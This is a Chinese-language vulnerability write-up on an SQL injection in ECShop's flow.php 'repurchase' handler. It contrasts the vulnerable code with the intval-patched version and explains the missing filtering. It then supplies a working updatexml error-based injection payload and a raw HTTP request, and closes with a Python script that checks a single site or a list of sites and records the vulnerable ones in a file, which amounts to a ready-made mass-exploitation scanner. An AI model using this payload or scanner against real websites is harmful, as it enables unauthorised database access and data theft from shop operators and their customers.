关于这个漏洞是新版本修复了。下载了古老的版本对比才发现的。只是怎么也没有想到ecshop也会犯这种低级的错误。
好吧,文件flow.php
elseif ($_REQUEST['step'] == 'repurchase') {
include_once('includes/cls_json.php');
$order_id = strip_tags($_POST['order_id']);
$order_id = json_str_iconv($order_id);
$user_id = $_SESSION['user_id'];
$json = new JSON;
$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
if (!$order) {
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
die($json->encode($result));
}
$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
$result = array('error' => 0, 'message' => '');
foreach ($order_goods as $goods) {
$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
$result = false;
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
}
}
die($json->encode($result));
}
这里的参数并非是新版的$order_id = intval($_POST[‘order_id’]);
elseif ($_REQUEST['step'] == 'repurchase') {
include_once('includes/cls_json.php');
$order_id = intval($_POST['order_id']);
$order_id = json_str_iconv($order_id);
$user_id = $_SESSION['user_id'];
$json = new JSON;
$order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
if (!$order) {
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
die($json->encode($result));
}
$db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
$result = array('error' => 0, 'message' => '');
foreach ($order_goods as $goods) {
$spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
$result = false;
$result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
}
}
die($json->encode($result));
}
继续查看json_str_iconv
function json_str_iconv($str)
{
if (EC_CHARSET != 'utf-8')
{
if (is_string($str))
{
return addslashes(stripslashes(ecs_iconv('utf-8', EC_CHARSET, $str)));
}
elseif (is_array($str))
{
foreach ($str as $key => $value)
{
$str[$key] = json_str_iconv($value);
}
return $str;
}
elseif (is_object($str))
{
foreach ($str as $key => $value)
{
$str->$key = json_str_iconv($value);
}
return $str;
}
else
{
return $str;
}
}
return $str;
}
这里显然没过滤了 再看看上面的SQL语句 居然没有单引号包含 这样就能直接注射了
POST提交一下内容到 http://localhost/flow.php?step=repurchase
order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#
一个post包
POST /flow.php?step=repurchase HTTP/1.1
Host:?127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: ECS[visit_times]=2; ECS_ID=1998571d464009d432a17951ee5852104eba8b75
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
order_id=1*
附上野生payload一枚
import requests as req
import optparse
def poc(url):
xode='MySQL server error report:Array'
url=url+'/flow.php'
try:
rgg=req.get(url)
except:
return '[-]Getting '+url+' Wrong'
if rgg.status_code !=200:
return '[-]'+url+' Wrong'
geturl=url+'?step=repurchase'
payload='order_id=1 or updatexml(1,concat(0x7e,(user())),0) or 11#'
a=req.post(geturl,data=payload)
if a.status_code==200:
if xode in a.text:
return 2
else:
return '[-]'+url+'Exploiting Fail'
else:
return '[-]'+url+' Fail!!'
def ifhttp(url):
if 'http://' in url:
return url
else:
return 'http://'+url
def r(filename):
try:
ff= open(filename).readlines()
except:
print'[-] The file is not exist'
exit(0)
return ff
def w(url):
f=open('Res.txt','a+')
f.write(url+'\n')
f.close
if __name__=='__main__':
parser = optparse.OptionParser('usage%prog -u -r ')
parser.add_option('-u', dest='url', type='string', help='the website')
parser.add_option('-r', dest='file', type='string', help='the file')
(options, args) = parser.parse_args()
url = options.url
f=options.file
if options.url == None and f==None:
print(parser.usage)
exit(0)
if options.url!=None:
url=ifhttp(url)
r=poc(url)
if r==2:
print '[+]'+url+' succeed'
w(url)
else:
print r
if f!=None:
for fff in r(f):
b=fff.strip('\n')
r=poc(ifhttp(b))
if r==2:
print '[+]'+b+' succeed'
w(b)
else:
print r